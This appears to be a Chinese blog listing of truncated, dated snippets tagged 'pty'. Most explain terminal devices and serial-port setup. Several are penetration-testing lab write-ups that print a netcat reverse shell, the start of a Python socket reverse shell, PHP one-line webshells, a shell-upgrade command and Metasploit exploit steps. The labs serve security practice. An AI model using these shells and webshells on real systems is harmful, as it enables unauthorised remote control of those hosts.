- 2024-10-23反弹shell优化
做个记录https://www.bilibili.com/video/BV1qp4y1Z7Pv?t=385.6有时反弹得到的shell是这样的:这种shell只能进行ls、cat这样的简单的查询动作,而对于进入mysql-uroot-p这种进入MySQL终端的交互行为就无能为力,这时就要在此shell上进行优化优化方式1:python3-c'importpty;p
- 2024-09-1821LTR靶机(漏洞复现)
网卡配置访问网页端口扫描nmap-sV-p-192.168.2.1200目录扫描右键检查,发现用户名和密码尝试ssh连接,连接失败尝试ftp连接,连接成功发现一个backup_log.php文件nc-e/bin/sh192.168.2.1285555python-c'importpty;pty.spawn
- 2024-07-3021LTR.com_Scene1_2.120靶机
getshell主机发现,端口目录扫描只有一个logs目录,接着往下扫访问首页,检查源代码,发现一组账号密码,可能是ssh,也可能是ftp的访问logs接口,没有权限尝试利用发现的账号密码,ssh没有成功,尝试ftp注意在windows上什么没有,用kali连接下载到本地查看一下拼接访问logs目录
- 2024-03-08Vulnhub内网渗透Jangow01靶场通关
详细请见个人博客靶场下载地址。下载下来后是.vmdk格式,vm直接导入。M1请使用UTM进行搭建,教程见此。该靶场可能出现网络问题,解决方案见此信息搜集arp-scan-l #主机发现ip为192.168.168.15nmap-sV-A-p-192.168.168.15 #端口扫描发现开放了21ftp和80http端口,对
- 2024-02-05Linux终端概念的理解
1pty(虚拟终端或伪终端):当我们远程telnet到主机或使用xterm时不也需要一个终端交互么?是的,这就是虚拟终端pty(pseudo-tty)。2tty(终端设备的统称):tty一词源于Teletypes,或者teletypewriters,原来指的是电传打字机,是通过串行线用打印机键盘通过阅读和发送信息的东西,后来这东
- 2024-01-31qemu重定向串口serial
背景运行qemu的环境为host,qemu模拟的系统为guest。基于不同的需求,有时需要对串口进行重定向qemu-serial选项qemu提供了很多的重定向选项,null,socket,udp,msmouse,vc,file,pipe,console,serial,pty,stdio,braille,tty,parport,spicevmc,下面我们简单列几个分析一
- 2023-12-15当你打开终端并输入命令时会发生什么?(下)
当你打开终端并输入命令时会发生什么?(下)哈喽大家好,我是咸鱼我们先来大致回顾一下文章《当你打开终端并输入命令时会发生什么?(上)》的内容终端设备是由电传打字机演变过来的,电传打字机通过物理线与大型计算机连接在一块来实现输入输出如上图,分别是二战时期的电传打字机和西门
- 2023-12-11vulnhub DC-1靶场
1.扫描主机sudoarp-scan-l扫描端口nmap-p-192.168.42.147扫描主机指纹,发现Drupal7cms2.得到shell(2.1,2.2)只用一种即可2.1开始msf漏洞利用mfconsolesearchdrupalsearch7600useexploit/unix/webapp/drupal_drupalgeddon2setrhosts192.168.42.147run2.2
- 2023-11-19常用木马和提权命令
作用是在Python中创建一个伪终端(pty),并在其中启动一个bashshell。这样,你可以在Python脚本中执行bash命令,就像在终端中一样。python-c'importpty;pty.spawn("/bin/bash")'一句话木马:<?php@eval($_REQUEST[ckl])?><?php@eval($_POST['ckl']);?>在PHP中,$_POST是一个包含
- 2023-06-0136 KVM管理设备-配置虚拟串口
36KVM管理设备-配置虚拟串口36.1概述在虚拟化环境下,由于管理和业务的需求,虚拟机与宿主机需要互相通信。但在云管理系统复杂的网络架构下,运行在管理平面的服务与运行在业务平面的虚拟机之间,不能简单的进行三层网络互相通信,导致服务部署和信息收集不够快速。因此需要提供虚拟串口
- 2023-01-26进入目标机后应及时升级shell
在以普通用户进入目标机后应该及时升级shell 命令python-c'importpty;pty.spawn("/bin/bash")' 不然有些命令无法使用像su命令,会返回“mustberunfromter
- 2023-01-06linux问题
问题:PTYallocationrequestfailedonchannel0系统当前使用的虚拟终端pty的数量已经达到了系统允许的上限。解决方法:关闭pts连接root执行ps-ef|greppts找到
- 2022-12-24CLion 中文乱码
别去设置 pty!!!!别去!!! 这里确保!!!GBK!!!!
- 2022-12-17零散知识点
pythonptypython-c'importsocket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.56.109",6666));os.dup2(s.fileno(
- 2022-11-27将shell切换为TTY
pythonpython-c'importpty;pty.spawn("/bin/bash")'#python2python3-c'importpty;pty.spawn("/bin/bash")'#python3stty获取到shell后,先Ctrl+z放到后台
- 2022-09-03tty和pts
tty(Teletype) :终端,本地。tty设备包括虚拟控制台,串口以及伪终端设备。/dev/tty代表当前tty设备pty(pseudo-tty)
- 2022-09-02什么是tty、pty、pts
1tty的原型teletypewriter,早期是这样的一个大型设备,多个teletypewriter链接起来可以进行实时通信,左端在纸上打的字右端收到后在纸上打出来。后来做出了可以把字母转